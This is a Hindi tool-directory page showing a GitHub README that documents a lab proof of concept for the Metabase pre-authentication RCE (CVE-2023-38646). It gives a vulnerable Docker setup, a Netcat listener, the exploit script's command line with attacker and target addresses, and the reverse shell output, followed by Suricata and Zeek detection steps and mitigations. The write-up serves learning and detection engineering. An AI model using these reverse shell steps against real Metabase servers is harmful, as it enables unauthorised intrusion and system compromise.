Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Metabase-Pre-Auth-RCE-POC — CVE-2023-38646 | Kitploit
उपकरण/GitHubGitHub/nosrevytsng/metabase-pre-auth-rce-poc
रक्षात्मक उपकरणभेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगघुसपैठ का पता लगानालर्निंग और शिक्षाघटना प्रतिक्रियापेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHubnosrevytsng/metabase-pre-auth-rce-poc

Metabase-Pre-Auth-RCE-POC

CVE-2023-38646

रिपॉजिटरी देखें
126 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2023-38646 — Metabase रिमोट कोड निष्पादन (RCE) प्रूफ-ऑफ-कॉन्सेप्ट

अवलोकन

यह भंडार एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) सुरक्षा अनुसंधान परियोजना का दस्तावेजीकरण करता है जो CVE-2023-38646 का विश्लेषण करता है, जो Metabase के कमजोर संस्करणों को प्रभावित करने वाली एक महत्वपूर्ण प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन (RCE) कमजोरी है।

इस परियोजना का उद्देश्य वास्तविक दुनिया की कमजोरी के पूर्ण जीवनचक्र को प्रदर्शित करना है, जिसमें शामिल हैं:

  • कमजोरी और उसके मूल कारण को समझना
  • एक नियंत्रित प्रयोगशाला वातावरण में शोषण को पुन: उत्पन्न करना
  • कमजोर सिस्टम पर रिवर्स शेल स्थापित करना
  • नेटवर्क निगरानी उपकरणों के माध्यम से हमले के व्यवहार का अवलोकन करना
  • डिटेक्शन इंजीनियरिंग तकनीकों का प्रदर्शन करना
  • रक्षात्मक शमन रणनीतियों का प्रस्ताव करना

यह भंडार निम्नलिखित में व्यावहारिक कौशल प्रदर्शित करने के लिए डिज़ाइन किया गया है:

  • कमजोरी अनुसंधान
  • शोषण पुनरुत्पादन
  • रिवर्स शेल उपयोग
  • नेटवर्क ट्रैफ़िक विश्लेषण
  • घुसपैठ का पता लगाने वाली प्रणालियाँ
  • सुरक्षा शमन रणनीतियाँ

कमजोरी पृष्ठभूमि

CVE-2023-38646 एक महत्वपूर्ण कमजोरी है जो Metabase के कुछ संस्करणों को प्रभावित करती है, जो एक ओपन-सोर्स व्यावसायिक खुफिया और विश्लेषण मंच है।

यह कमजोरी एक हमलावर को एप्लिकेशन की सेटअप या कॉन्फ़िगरेशन प्रक्रिया में कमजोरियों का शोषण करके अप्रमाणित रिमोट कोड निष्पादन प्राप्त करने की अनुमति देती है।

मुख्य विवरण:

  • CVE ID: CVE-2023-38646
  • गंभीरता: गंभीर
  • CVSS स्कोर: 9.8
  • हमला वेक्टर: नेटवर्क
  • प्रमाणीकरण आवश्यक: नहीं
  • प्रभाव: रिमोट कोड निष्पादन (RCE)

सफल शोषण एक हमलावर को सक्षम बनाता है:

  • लक्ष्य प्रणाली पर मनमाने आदेश निष्पादित करना
  • रिवर्स शेल स्थापित करना
  • संभावित रूप से पूर्ण सिस्टम से समझौता प्राप्त करना

आधिकारिक संदर्भ:

  • https://nvd.nist.gov/vuln/detail/CVE-2023-38646
  • https://www.metabase.com/

उपयोग की गई प्रौद्योगिकियाँ और उपकरण

यह परियोजना आक्रामक सुरक्षा उपकरणों और रक्षात्मक निगरानी उपकरणों दोनों को जोड़ती है।

आक्रामक सुरक्षा

  • Python
  • Reverse shell payloads
  • कस्टम शोषण स्क्रिप्ट
  • Metabase कमजोर इंस्टेंस

पहचान और निगरानी

  • Suricata — घुसपैठ का पता लगाने वाली प्रणाली (IDS)
  • Zeek — नेटवर्क सुरक्षा निगरानी (NSM)

रक्षात्मक प्रौद्योगिकियाँ

  • ModSecurity — वेब एप्लिकेशन फ़ायरवॉल
  • OSSEC — होस्ट-आधारित घुसपैठ का पता लगाने वाली प्रणाली

प्रयोगशाला वातावरण

प्लेसहोल्डर — अपने प्रयोगशाला सेटअप का वर्णन करें

उदाहरण:

  • हमलावर मशीन: Kali Linux
  • लक्ष्य मशीन: कमजोर Metabase सर्वर
  • नेटवर्क निगरानी मशीन: सुरक्षा निगरानी VM

शोषण PoC

हमला श्रृंखला आरेख

flowchart LR
    A[Attacker] --> B[Vulnerable Metabase Instance]
    B --> C[CVE-2023-38646 Exploit]
    C --> D[Remote Code Execution]
    D --> E[Reverse Shell Established]
    E --> F[Command Execution on Target]

यह आरेख इस परियोजना में उपयोग किए गए उच्च-स्तरीय हमले के प्रवाह को दर्शाता है।

प्रूफ-ऑफ-कॉन्सेप्ट (PoC) सेट-अप

Docker स्थापना और सेटअप:

sudo apt update
sudo apt upgrade -y

sudo apt install docker.io -y

sudo systemctl start docker 
sudo systemctl enable docker

sudo docker run hello-world

Docker प्रारंभ:

Docker का उपयोग करके एक कमजोर Metabase Enterprise इंस्टेंस (v1.44.0) तैनात किया गया था।

sudo docker run -d -p 3000:3000 --name metabase-enterprise metabase/metabase-enterprise:v1.44.0

यह पोर्ट 3000 पर Metabase वेब इंटरफ़ेस को उजागर करता है, सेटअप पृष्ठ तक पहुंच की अनुमति देता है।

यदि Docker पहले से चल रहा है, तो फिर से शुरू करने के लिए निम्नलिखित कमांड लाइन निष्पादित करें:

sudo docker stop metabase-enterprise
sudo docker rm metabase-enterprise

'Docker सेटअप' प्लेसहोल्डर

एक बार कंटेनर चलने के बाद, Metabase इंटरफ़ेस ब्राउज़र के माध्यम से सुलभ हो जाता है।

    http://0.0.0.0:3000/setup -or- http://127.0.0.1:3000/setup

सेटअप पृष्ठ पुष्टि करता है कि Metabase इंस्टेंस सक्रिय है और कॉन्फ़िगरेशन के लिए तैयार है।

शोषण परिदृश्य 1

BurpSuite

डेमो / दस्तावेज़ीकरण

स्क्रीनशॉट या स्पष्टीकरण के लिए प्लेसहोल्डर

शोषण परिदृश्य 2 - पायथन स्क्रिप्ट शोषण

  1. रिवर्स शेल लिसनर तैयारी

शोषण लॉन्च करने से पहले, रिवर्स शेल कनेक्शन प्राप्त करने के लिए हमलावर मशीन पर एक Netcat लिसनर शुरू किया जाता है।

    nc -lvnp 6666

यह लिसनर शोषित Metabase सर्वर से आने वाले कनेक्शनों की प्रतीक्षा करता है।

स्क्रीनशॉट या स्पष्टीकरण के लिए प्लेसहोल्डर

  1. शोषण निष्पादन शोषण स्क्रिप्ट हमलावर मशीन से निष्पादित की जाती है।
    python3 CVE-2023-38646-Reverse-Shell.py \   ---> Exploit Name
    --rhost http://192.168.1.136:3000 \         ---> Targer IP Address
    --lhost 192.168.1.137 \                     ---> Attacker's IP Address
    --lport 6666                                ---> Attacker's Listening Port

पेलोड एक कमांड निष्पादित करता है जो हमलावर मशीन पर वापस रिवर्स शेल स्थापित करता है।

  1. रिवर्स शेल स्थापित एक बार पेलोड सफलतापूर्वक निष्पादित होने के बाद, कमजोर Metabase इंस्टेंस हमलावर की मशीन पर वापस कनेक्शन शुरू करता है।

Netcat लिसनर कनेक्शन प्राप्त करता है, हमलावर को सिस्टम तक शेल पहुंच प्रदान करता है।

    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$

पीड़ित के डिवाइस से कनेक्शन की पुष्टि के लिए:

    whoami

आउटपुट:

    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$ whoami
    whoami
    metabase
    bash-5.1$

डिटेक्शन इंजीनियरिंग PoC

यह परियोजना यह भी प्रदर्शित करती है कि नेटवर्क निगरानी उपकरणों का उपयोग करके शोषण गतिविधि का पता कैसे लगाया जा सकता है।

Suricata पहचान

Suricata (IDS) का उपयोग शोषण से जुड़े संदिग्ध पैटर्न के लिए नेटवर्क ट्रैफ़िक की निगरानी के लिए किया गया था।

sudo suricata -i eth0

प्लेसहोल्डर: Suricata अलर्ट स्क्रीनशॉट डालें

evidence/detection/suricata_alert.png

वास्तविक समय में अलर्ट देखने के लिए, Suricata लॉग्स का उपयोग करके निगरानी की गई:

tail -f /var/log/suricata/fast.log

प्लेसहोल्डर: Suricata लॉग स्क्रीनशॉट डालें

evidence/detection/suricata_log.png

एक निष्क्रिय दृष्टिकोण के लिए, जब भी Suricata संदिग्ध ट्रैफ़िक का पता लगाता है, डेस्कटॉप अलर्ट उत्पन्न करने के लिए एक कस्टम सूचना स्क्रिप्ट का उपयोग किया गया था।

nohup ./suricata-popup-alert.sh >/dev/null 2>&1 &

जब शोषण निष्पादित किया गया, तो Suricata ने Metabase शोषण प्रयास से जुड़ी संदिग्ध गतिविधि का संकेत देने वाले अलर्ट उत्पन्न किए।

प्लेसहोल्डर: Suricata लॉग स्क्रीनशॉट डालें

evidence/detection/suricata_noti.png

उदाहरण:

प्लेसहोल्डर: Suricata लॉग स्क्रीनशॉट डालें

evidence/detection/suricata_noti.png

Zeek नेटवर्क विश्लेषण

IDS निगरानी के अलावा, नेटवर्क ट्रैफ़िक का विश्लेषण करने और विसंगतिपूर्ण व्यवहार की पहचान करने के लिए Zeek का उपयोग किया गया था।

नेटवर्क ट्रैफ़िक को कैप्चर और विश्लेषण करना शुरू करने के लिए Zeek को इन कमांड्स का उपयोग करके शुरू किया जाता है:

sudo /usr/local/zeek/bin/zeek -i eth0

प्लेसहोल्डर: Zeek आरंभिक स्क्रीनशॉट डालें

evidence/detection/zeek.png

कनेक्शन लॉग्स का निरीक्षण करके, पोर्ट 6666 पर रिवर्स शेल ट्रैफ़िक देखा जा सकता है।

192.168.1.136 → 192.168.1.137:6666

प्लेसहोल्डर: Zeek लॉग स्क्रीनशॉट डालें

evidence/detection/zeek_log.png

शमन और रक्षात्मक रणनीतियाँ

कई शमन रणनीतियाँ शोषण के जोखिम को कम कर सकती हैं।

रणनीतिविवरण
पैच प्रबंधनMetabase को एक ऐसे संस्करण में अपग्रेड करें जो CVE-2023-38646 को पैच करता है
वेब एप्लिकेशन फ़ायरवॉल (ModSecurity)दुर्भावनापूर्ण HTTP अनुरोधों को फ़िल्टर करें
होस्ट घुसपैठ का पता लगाना (OSSEC)संदिग्ध सिस्टम व्यवहार की निगरानी करें
नेटवर्क निगरानी (Suricata & Zeek)असामान्य ट्रैफ़िक पैटर्न का पता लगाएं

भंडार संरचना

टूल डाउनलोड करें